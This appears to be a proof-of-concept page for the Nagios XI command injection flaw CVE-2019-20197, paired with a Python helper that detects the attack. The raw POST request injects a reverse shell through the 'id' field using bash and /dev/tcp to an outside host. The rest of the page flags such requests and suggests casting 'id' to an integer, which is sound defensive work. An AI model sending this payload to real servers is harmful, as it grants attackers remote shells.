Nagios XI remote command execution vulnerability (CVE-2019-20197)

POC:

POST /nagiosxi/includes/components/scheduledreporting/schedulereport.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: nagiosxi=6l8idvsacv6ejiandm0ospub51
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 466

nsp=81ee683a90099cd27011d419da672cfc889d02903663742ccc8b1810c67f9784&update=1&id=a";bash -i >%26 /dev/tcp/x.x.x.x/443
0>%261;&type=&url=%2Fnagiosxi%2Freports%2Feventlog.php%3Fsearch%3D%26reportperiod%3Dlast24hours%26startdate%3D%26enddate%3D&wurl=&userid=0 &length=0&sendonce=0&name=Eventlog+Report&frequency=Daily&hour=09&minute=00&ampm=AM&dayofweek=1&dayofmonth=1&attachments%5Bpdf%5D=on&recip ients=root%40localhost&subject=Eventlog+Report&body=&updateButton=
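The request above shows the injection point: the `id` form field of `schedulereport.php` is sent with a double quote, a semicolon and a shell command appended. A defender can spot this class of request in a WAF or in replayed access logs by insisting that `id` is a plain integer. The following detection helper is an added example and is not part of the original POC or of Nagios XI; it assumes (not stated on the page) that a scheduled-report `id` is normally a numeric record identifier, and the two sample requests it checks are constructed here, not captured traffic.

```python
"""Flag POST requests to schedulereport.php whose `id` parameter is not a plain integer.

Added example, not part of the original POC or of Nagios XI. Assumption: a legitimate
scheduled-report `id` is numeric; anything else is treated as suspicious, and values
containing shell metacharacters are reported separately as high severity.
"""
import re
from urllib.parse import parse_qs

# Endpoint taken from the POC request line.
TARGET_PATH = "/nagiosxi/includes/components/scheduledreporting/schedulereport.php"

# Characters that have no business in a numeric identifier and that a shell would interpret.
SHELL_META = re.compile(r'[;"\'`|&$<>(){}\n]')


def parse_raw_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    path = target.split("?", 1)[0]          # ignore any query string when matching the path
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def find_suspicious_ids(raw: str):
    """Return a list of (severity, value) for every offending `id` field; empty if benign."""
    method, path, _headers, body = parse_raw_request(raw)
    if method != "POST" or path != TARGET_PATH:
        return []
    params = parse_qs(body, keep_blank_values=True)   # also decodes %26, %22 and '+'
    findings = []
    for value in params.get("id", []):
        if SHELL_META.search(value):
            findings.append(("high", value))          # shell metacharacters present
        elif not value.isdigit():
            findings.append(("medium", value))        # non-numeric but no metacharacters
    return findings


def build_request(path: str, body: str) -> str:
    """Assemble a minimal raw POST request (constructed sample data for this example)."""
    return (
        f"POST {path} HTTP/1.1\r\n"
        "Host: nagios.example.invalid\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
        f"{body}"
    )


# Constructed samples: one ordinary report update and one carrying shell syntax in `id`.
BENIGN = build_request(TARGET_PATH, "nsp=deadbeef&update=1&id=12&name=Eventlog+Report")
SUSPICIOUS = build_request(TARGET_PATH, "nsp=deadbeef&update=1&id=7%22%3Becho+test&name=Eventlog+Report")
OTHER_PATH = build_request("/nagiosxi/index.php", "id=7%22%3Becho+test")

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("suspicious", SUSPICIOUS), ("other path", OTHER_PATH)):
        print(label, find_suspicious_ids(req))
```

Running the block prints an empty list for the benign request, `[('high', '7";echo test')]` for the constructed suspicious one, and an empty list for the request to an unrelated path. The same `find_suspicious_ids` check can be run over request bodies recorded by a reverse proxy, and the equivalent server-side fix is the mirror image: reject or cast `id` to an integer before it reaches any command string.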